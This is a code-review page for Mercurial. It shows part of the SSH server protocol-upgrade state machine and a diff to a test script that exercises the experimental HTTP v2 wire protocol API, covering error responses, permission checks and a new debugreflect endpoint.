687 735 elif isinstance(rsp, wireprototypes.streamres):
688 736 _sshv1respondstream(fout, rsp)
689 737 elif isinstance(rsp, wireprototypes.streamreslegacy):
690 738 _sshv1respondstream(fout, rsp)
691 739 elif isinstance(rsp, wireprototypes.pushres):
692 740 _sshv1respondbytes(fout, b'')
693 741 _sshv1respondbytes(fout, b'%d' % rsp.res)
694 742 elif isinstance(rsp, wireprototypes.pusherr):
695 743 _sshv1respondbytes(fout, rsp.res)
696 744 elif isinstance(rsp, wireprototypes.ooberror):
697 745 _sshv1respondooberror(fout, ui.ferr, rsp.message)
698 746 else:
699 747 raise error.ProgrammingError('unhandled response type from '
700 748 'wire protocol command: %s' % rsp)
701 749
702 750 # For now, protocol version 2 serving just goes back to version 1.
703 751 elif state == 'protov2-serving':
704 752 state = 'protov1-serving'
705 753 continue
706 754
707 755 elif state == 'upgrade-initial':
708 756 # We should never transition into this state if we've switched
709 757 # protocols.
710 758 assert not protoswitched
711 759 assert proto.name == wireprototypes.SSHV1
712 760
713 761 # Expected: upgrade <token> <capabilities>
714 762 # If we get something else, the request is malformed. It could be
715 763 # from a future client that has altered the upgrade line content.
716 764 # We treat this as an unknown command.
717 765 try:
718 766 token, caps = request.split(b' ')[1:]
719 767 except ValueError:
720 768 _sshv1respondbytes(fout, b'')
721 769 state = 'protov1-serving'
722 770 continue
723 771
724 772 # Send empty response if we don't support upgrading protocols.
725 773 if not ui.configbool('experimental', 'sshserver.support-v2'):
726 774 _sshv1respondbytes(fout, b'')
727 775 state = 'protov1-serving'
728 776 continue
729 777
730 778 try:
731 779 caps = urlreq.parseqs(caps)
732 780 except ValueError:
733 781 _sshv1respondbytes(fout, b'')
734 782 state = 'protov1-serving'
735 783 continue
736 784
737 785 # We don't see an upgrade request to protocol version 2. Ignore
738 786 # the upgrade request.
739 787 wantedprotos = caps.get(b'proto', [b''])[0]
740 788 if SSHV2 not in wantedprotos:
741 789 _sshv1respondbytes(fout, b'')
742 790 state = 'protov1-serving'
743 791 continue
744 792
745 793 # It looks like we can honor this upgrade request to protocol 2.
746 794 # Filter the rest of the handshake protocol request lines.
747 795 state = 'upgrade-v2-filter-legacy-handshake'
748 796 continue
749 797
750 798 elif state == 'upgrade-v2-filter-legacy-handshake':
751 799 # Client should have sent legacy handshake after an ``upgrade``
752 800 # request. Expected lines:
753 801 #
754 802 # hello
755 803 # between
756 804 # pairs 81
757 805 # 0000...-0000...
758 806
759 807 ok = True
760 808 for line in (b'hello', b'between', b'pairs 81'):
761 809 request = fin.readline()[:-1]
762 810
763 811 if request != line:
764 812 _sshv1respondooberror(fout, ui.ferr,
765 813 b'malformed handshake protocol: '
766 814 b'missing %s' % line)
767 815 ok = False
768 816 state = 'shutdown'
769 817 break
770 818
771 819 if not ok:
772 820 continue
773 821
774 822 request = fin.read(81)
775 823 if request != b'%s-%s' % (b'0' * 40, b'0' * 40):
776 824 _sshv1respondooberror(fout, ui.ferr,
777 825 b'malformed handshake protocol: '
778 826 b'missing between argument value')
779 827 state = 'shutdown'
780 828 continue
781 829
782 830 state = 'upgrade-v2-finish'
783 831 continue
784 832
785 833 elif state == 'upgrade-v2-finish':
786 834 # Send the upgrade response.
787 835 fout.write(b'upgraded %s %s\n' % (token, SSHV2))
788 836 servercaps = wireproto.capabilities(repo, proto)
789 837 rsp = b'capabilities: %s' % servercaps.data
790 838 fout.write(b'%d\n%s\n' % (len(rsp), rsp))
791 839 fout.flush()
792 840
793 841 proto = sshv2protocolhandler(ui, fin, fout)
794 842 protoswitched = True
795 843
796 844 state = 'protov2-serving'
797 845 continue
798 846
799 847 elif state == 'shutdown':
800 848 break
801 849
802 850 else:
803 851 raise error.ProgrammingError('unhandled ssh server state: %s' %
804 852 state)
805 853
806 854 class sshserver(object):
807 855 def __init__(self, ui, repo, logfh=None):
808 856 self._ui = ui
809 857 self._repo = repo
810 858 self._fin = ui.fin
811 859 self._fout = ui.fout
812 860
813 861 # Log write I/O to stdout and stderr if configured.
814 862 if logfh:
815 863 self._fout = util.makeloggingfileobject(
816 864 logfh, self._fout, 'o', logdata=True)
817 865 ui.ferr = util.makeloggingfileobject(
818 866 logfh, ui.ferr, 'e', logdata=True)
819 867
820 868 hook.redirect(True)
821 869 ui.fout = repo.ui.fout = ui.ferr
822 870
823 871 # Prevent insertion/deletion of CRs
824 872 util.setbinary(self._fin)
825 873 util.setbinary(self._fout)
826 874
827 875 def serve_forever(self):
828 876 self.serveuntil(threading.Event())
829 877 sys.exit(0)
830 878
831 879 def serveuntil(self, ev):
832 880 """Serve until a threading.Event is set."""
833 881 _runsshserver(self._ui, self._repo, self._fin, self._fout, ev)
@@ -1,331 +1,406 b''
1 1 $ HTTPV2=exp-http-v2-0001
2 2 $ MEDIATYPE=application/mercurial-exp-framing-0001
3 3
4 4 $ send() {
5 5 > hg --verbose debugwireproto --peer raw http://$LOCALIP:$HGPORT/
6 6 > }
7 7
8 8 $ cat > dummycommands.py << EOF
9 9 > from mercurial import wireprototypes, wireproto
10 10 > @wireproto.wireprotocommand('customreadonly', permission='pull')
11 11 > def customreadonly(repo, proto):
12 12 > return wireprototypes.bytesresponse(b'customreadonly bytes response')
13 13 > @wireproto.wireprotocommand('customreadwrite', permission='push')
14 14 > def customreadwrite(repo, proto):
15 15 > return wireprototypes.bytesresponse(b'customreadwrite bytes response')
16 16 > EOF
17 17
18 18 $ cat >> $HGRCPATH << EOF
19 19 > [extensions]
20 20 > dummycommands = $TESTTMP/dummycommands.py
21 21 > EOF
22 22
23 23 $ hg init server
24 24 $ cat > server/.hg/hgrc << EOF
25 25 > [experimental]
26 26 > web.apiserver = true
27 27 > EOF
28 28 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
29 29 $ cat hg.pid > $DAEMON_PIDS
30 30
31 31 HTTP v2 protocol not enabled by default
32 32
33 33 $ send << EOF
34 34 > httprequest GET api/$HTTPV2
35 35 > user-agent: test
36 36 > EOF
37 37 using raw connection to peer
38 38 s> GET /api/exp-http-v2-0001 HTTP/1.1\r\n
39 39 s> Accept-Encoding: identity\r\n
40 40 s> user-agent: test\r\n
41 41 s> host: $LOCALIP:$HGPORT\r\n (glob)
42 42 s> \r\n
43 43 s> makefile('rb', None)
44 44 s> HTTP/1.1 404 Not Found\r\n
45 45 s> Server: testing stub value\r\n
46 46 s> Date: $HTTP_DATE$\r\n
47 47 s> Content-Type: text/plain\r\n
48 48 s> Content-Length: 33\r\n
49 49 s> \r\n
50 50 s> API exp-http-v2-0001 not enabled\n
51 51
52 52 Restart server with support for HTTP v2 API
53 53
54 54 $ killdaemons.py
55 55 $ cat > server/.hg/hgrc << EOF
56 56 > [experimental]
57 57 > web.apiserver = true
58 58 > web.api.http-v2 = true
59 59 > EOF
60 60
61 61 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
62 62 $ cat hg.pid > $DAEMON_PIDS
63 63
64 64 Request to unknown command yields 404
65 65
66 66 $ send << EOF
67 67 > httprequest POST api/$HTTPV2/ro/badcommand
68 68 > user-agent: test
69 69 > EOF
70 70 using raw connection to peer
71 71 s> POST /api/exp-http-v2-0001/ro/badcommand HTTP/1.1\r\n
72 72 s> Accept-Encoding: identity\r\n
73 73 s> user-agent: test\r\n
74 74 s> host: $LOCALIP:$HGPORT\r\n (glob)
75 75 s> \r\n
76 76 s> makefile('rb', None)
77 77 s> HTTP/1.1 404 Not Found\r\n
78 78 s> Server: testing stub value\r\n
79 79 s> Date: $HTTP_DATE$\r\n
80 80 s> Content-Type: text/plain\r\n
81 81 s> Content-Length: 42\r\n
82 82 s> \r\n
83 83 s> unknown wire protocol command: badcommand\n
84 84
85 85 GET to read-only command yields a 405
86 86
87 87 $ send << EOF
88 88 > httprequest GET api/$HTTPV2/ro/customreadonly
89 89 > user-agent: test
90 90 > EOF
91 91 using raw connection to peer
92 92 s> GET /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
93 93 s> Accept-Encoding: identity\r\n
94 94 s> user-agent: test\r\n
95 95 s> host: $LOCALIP:$HGPORT\r\n (glob)
96 96 s> \r\n
97 97 s> makefile('rb', None)
98 98 s> HTTP/1.1 405 Method Not Allowed\r\n
99 99 s> Server: testing stub value\r\n
100 100 s> Date: $HTTP_DATE$\r\n
101 101 s> Allow: POST\r\n
102 102 s> Content-Length: 30\r\n
103 103 s> \r\n
104 104 s> commands require POST requests
105 105
106 106 Missing Accept header results in 406
107 107
108 108 $ send << EOF
109 109 > httprequest POST api/$HTTPV2/ro/customreadonly
110 110 > user-agent: test
111 111 > EOF
112 112 using raw connection to peer
113 113 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
114 114 s> Accept-Encoding: identity\r\n
115 115 s> user-agent: test\r\n
116 116 s> host: $LOCALIP:$HGPORT\r\n (glob)
117 117 s> \r\n
118 118 s> makefile('rb', None)
119 119 s> HTTP/1.1 406 Not Acceptable\r\n
120 120 s> Server: testing stub value\r\n
121 121 s> Date: $HTTP_DATE$\r\n
122 122 s> Content-Type: text/plain\r\n
123 123 s> Content-Length: 85\r\n
124 124 s> \r\n
125 125 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
126 126
127 127 Bad Accept header results in 406
128 128
129 129 $ send << EOF
130 130 > httprequest POST api/$HTTPV2/ro/customreadonly
131 131 > accept: invalid
132 132 > user-agent: test
133 133 > EOF
134 134 using raw connection to peer
135 135 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
136 136 s> Accept-Encoding: identity\r\n
137 137 s> accept: invalid\r\n
138 138 s> user-agent: test\r\n
139 139 s> host: $LOCALIP:$HGPORT\r\n (glob)
140 140 s> \r\n
141 141 s> makefile('rb', None)
142 142 s> HTTP/1.1 406 Not Acceptable\r\n
143 143 s> Server: testing stub value\r\n
144 144 s> Date: $HTTP_DATE$\r\n
145 145 s> Content-Type: text/plain\r\n
146 146 s> Content-Length: 85\r\n
147 147 s> \r\n
148 148 s> client MUST specify Accept header with value: application/mercurial-exp-framing-0001\n
149 149
150 150 Bad Content-Type header results in 415
151 151
152 152 $ send << EOF
153 153 > httprequest POST api/$HTTPV2/ro/customreadonly
154 154 > accept: $MEDIATYPE
155 155 > user-agent: test
156 156 > content-type: badmedia
157 157 > EOF
158 158 using raw connection to peer
159 159 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
160 160 s> Accept-Encoding: identity\r\n
161 161 s> accept: application/mercurial-exp-framing-0001\r\n
162 162 s> content-type: badmedia\r\n
163 163 s> user-agent: test\r\n
164 164 s> host: $LOCALIP:$HGPORT\r\n (glob)
165 165 s> \r\n
166 166 s> makefile('rb', None)
167 167 s> HTTP/1.1 415 Unsupported Media Type\r\n
168 168 s> Server: testing stub value\r\n
169 169 s> Date: $HTTP_DATE$\r\n
170 170 s> Content-Type: text/plain\r\n
171 171 s> Content-Length: 88\r\n
172 172 s> \r\n
173 173 s> client MUST send Content-Type header with value: application/mercurial-exp-framing-0001\n
174 174
175 175 Request to read-only command works out of the box
176 176
177 177 $ send << EOF
178 178 > httprequest POST api/$HTTPV2/ro/customreadonly
179 179 > accept: $MEDIATYPE
180 180 > content-type: $MEDIATYPE
181 181 > user-agent: test
182 182 > frame command-name eos customreadonly
183 183 > EOF
184 184 using raw connection to peer
185 185 s> POST /api/exp-http-v2-0001/ro/customreadonly HTTP/1.1\r\n
186 186 s> Accept-Encoding: identity\r\n
187 187 s> accept: application/mercurial-exp-framing-0001\r\n
188 188 s> content-type: application/mercurial-exp-framing-0001\r\n
189 189 s> user-agent: test\r\n
190 190 s> content-length: 18\r\n
191 191 s> host: $LOCALIP:$HGPORT\r\n (glob)
192 192 s> \r\n
193 193 s> \x0e\x00\x00\x11customreadonly
194 194 s> makefile('rb', None)
195 195 s> HTTP/1.1 200 OK\r\n
196 196 s> Server: testing stub value\r\n
197 197 s> Date: $HTTP_DATE$\r\n
198 198 s> Content-Type: text/plain\r\n
199 199 s> Content-Length: 18\r\n
200 200 s> \r\n
201 201 s> ro/customreadonly\n
202 202
203 203 Request to read-write command fails because server is read-only by default
204 204
205 205 GET to read-write request yields 405
206 206
207 207 $ send << EOF
208 208 > httprequest GET api/$HTTPV2/rw/customreadonly
209 209 > user-agent: test
210 210 > EOF
211 211 using raw connection to peer
212 212 s> GET /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
213 213 s> Accept-Encoding: identity\r\n
214 214 s> user-agent: test\r\n
215 215 s> host: $LOCALIP:$HGPORT\r\n (glob)
216 216 s> \r\n
217 217 s> makefile('rb', None)
218 218 s> HTTP/1.1 405 Method Not Allowed\r\n
219 219 s> Server: testing stub value\r\n
220 220 s> Date: $HTTP_DATE$\r\n
221 221 s> Allow: POST\r\n
222 222 s> Content-Length: 30\r\n
223 223 s> \r\n
224 224 s> commands require POST requests
225 225
226 226 Even for unknown commands
227 227
228 228 $ send << EOF
229 229 > httprequest GET api/$HTTPV2/rw/badcommand
230 230 > user-agent: test
231 231 > EOF
232 232 using raw connection to peer
233 233 s> GET /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
234 234 s> Accept-Encoding: identity\r\n
235 235 s> user-agent: test\r\n
236 236 s> host: $LOCALIP:$HGPORT\r\n (glob)
237 237 s> \r\n
238 238 s> makefile('rb', None)
239 239 s> HTTP/1.1 405 Method Not Allowed\r\n
240 240 s> Server: testing stub value\r\n
241 241 s> Date: $HTTP_DATE$\r\n
242 242 s> Allow: POST\r\n
243 243 s> Content-Length: 30\r\n
244 244 s> \r\n
245 245 s> commands require POST requests
246 246
247 247 SSL required by default
248 248
249 249 $ send << EOF
250 250 > httprequest POST api/$HTTPV2/rw/customreadonly
251 251 > user-agent: test
252 252 > EOF
253 253 using raw connection to peer
254 254 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
255 255 s> Accept-Encoding: identity\r\n
256 256 s> user-agent: test\r\n
257 257 s> host: $LOCALIP:$HGPORT\r\n (glob)
258 258 s> \r\n
259 259 s> makefile('rb', None)
260 260 s> HTTP/1.1 403 ssl required\r\n
261 261 s> Server: testing stub value\r\n
262 262 s> Date: $HTTP_DATE$\r\n
263 263 s> Content-Length: 17\r\n
264 264 s> \r\n
265 265 s> permission denied
266 266
267 267 Restart server to allow non-ssl read-write operations
268 268
269 269 $ killdaemons.py
270 270 $ cat > server/.hg/hgrc << EOF
271 271 > [experimental]
272 272 > web.apiserver = true
273 273 > web.api.http-v2 = true
274 274 > [web]
275 275 > push_ssl = false
276 276 > allow-push = *
277 277 > EOF
278 278
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid
279 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
280 280 $ cat hg.pid > $DAEMON_PIDS
281 281
282 282 Authorized request for valid read-write command works
283 283
284 284 $ send << EOF
285 285 > httprequest POST api/$HTTPV2/rw/customreadonly
286 286 > user-agent: test
287 287 > accept: $MEDIATYPE
288 288 > content-type: $MEDIATYPE
289 289 > frame command-name eos customreadonly
290 290 > EOF
291 291 using raw connection to peer
292 292 s> POST /api/exp-http-v2-0001/rw/customreadonly HTTP/1.1\r\n
293 293 s> Accept-Encoding: identity\r\n
294 294 s> accept: application/mercurial-exp-framing-0001\r\n
295 295 s> content-type: application/mercurial-exp-framing-0001\r\n
296 296 s> user-agent: test\r\n
297 297 s> content-length: 18\r\n
298 298 s> host: $LOCALIP:$HGPORT\r\n (glob)
299 299 s> \r\n
300 300 s> \x0e\x00\x00\x11customreadonly
301 301 s> makefile('rb', None)
302 302 s> HTTP/1.1 200 OK\r\n
303 303 s> Server: testing stub value\r\n
304 304 s> Date: $HTTP_DATE$\r\n
305 305 s> Content-Type: text/plain\r\n
306 306 s> Content-Length: 18\r\n
307 307 s> \r\n
308 308 s> rw/customreadonly\n
309 309
310 310 Authorized request for unknown command is rejected
311 311
312 312 $ send << EOF
313 313 > httprequest POST api/$HTTPV2/rw/badcommand
314 314 > user-agent: test
315 315 > accept: $MEDIATYPE
316 316 > EOF
317 317 using raw connection to peer
318 318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
319 319 s> Accept-Encoding: identity\r\n
320 320 s> accept: application/mercurial-exp-framing-0001\r\n
321 321 s> user-agent: test\r\n
322 322 s> host: $LOCALIP:$HGPORT\r\n (glob)
323 323 s> \r\n
324 324 s> makefile('rb', None)
325 325 s> HTTP/1.1 404 Not Found\r\n
326 326 s> Server: testing stub value\r\n
327 327 s> Date: $HTTP_DATE$\r\n
328 328 s> Content-Type: text/plain\r\n
329 329 s> Content-Length: 42\r\n
330 330 s> \r\n
331 331 s> unknown wire protocol command: badcommand\n
332
333 debugreflect isn't enabled by default
334
335 $ send << EOF
336 > httprequest POST api/$HTTPV2/ro/debugreflect
337 > user-agent: test
338 > EOF
339 using raw connection to peer
340 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
341 s> Accept-Encoding: identity\r\n
342 s> user-agent: test\r\n
343 s> host: $LOCALIP:$HGPORT\r\n (glob)
344 s> \r\n
345 s> makefile('rb', None)
346 s> HTTP/1.1 404 Not Found\r\n
347 s> Server: testing stub value\r\n
348 s> Date: $HTTP_DATE$\r\n
349 s> Content-Type: text/plain\r\n
350 s> Content-Length: 34\r\n
351 s> \r\n
352 s> debugreflect service not available
353
354 Restart server to get debugreflect endpoint
355
356 $ killdaemons.py
357 $ cat > server/.hg/hgrc << EOF
358 > [experimental]
359 > web.apiserver = true
360 > web.api.debugreflect = true
361 > web.api.http-v2 = true
362 > [web]
363 > push_ssl = false
364 > allow-push = *
365 > EOF
366
367 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
368 $ cat hg.pid > $DAEMON_PIDS
369
370 Command frames can be reflected via debugreflect
371
372 $ send << EOF
373 > httprequest POST api/$HTTPV2/ro/debugreflect
374 > accept: $MEDIATYPE
375 > content-type: $MEDIATYPE
376 > user-agent: test
377 > frame command-name have-args command1
378 > frame command-argument 0 \x03\x00\x04\x00fooval1
379 > frame command-argument eoa \x04\x00\x03\x00bar1val
380 > EOF
381 using raw connection to peer
382 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
383 s> Accept-Encoding: identity\r\n
384 s> accept: application/mercurial-exp-framing-0001\r\n
385 s> content-type: application/mercurial-exp-framing-0001\r\n
386 s> user-agent: test\r\n
387 s> content-length: 42\r\n
388 s> host: $LOCALIP:$HGPORT\r\n (glob)
389 s> \r\n
390 s> \x08\x00\x00\x12command1\x0b\x00\x00 \x03\x00\x04\x00fooval1\x0b\x00\x00"\x04\x00\x03\x00bar1val
391 s> makefile('rb', None)
392 s> HTTP/1.1 200 OK\r\n
393 s> Server: testing stub value\r\n
394 s> Date: $HTTP_DATE$\r\n
395 s> Content-Type: text/plain\r\n
396 s> Content-Length: 291\r\n
397 s> \r\n
398 s> received: 1 2 command1\n
399 s> ["wantframe", {"state": "command-receiving-args"}]\n
400 s> received: 2 0 \x03\x00\x04\x00fooval1\n
401 s> ["wantframe", {"state": "command-receiving-args"}]\n
402 s> received: 2 2 \x04\x00\x03\x00bar1val\n
403 s> ["runcommand", {"args": {"bar1": "val", "foo": "val1"}, "command": "command1", "data": null}]\n
404 s> received: <no frame>
405
406 $ cat error.log
General Comments 0
You need to be logged in to leave comments. Login now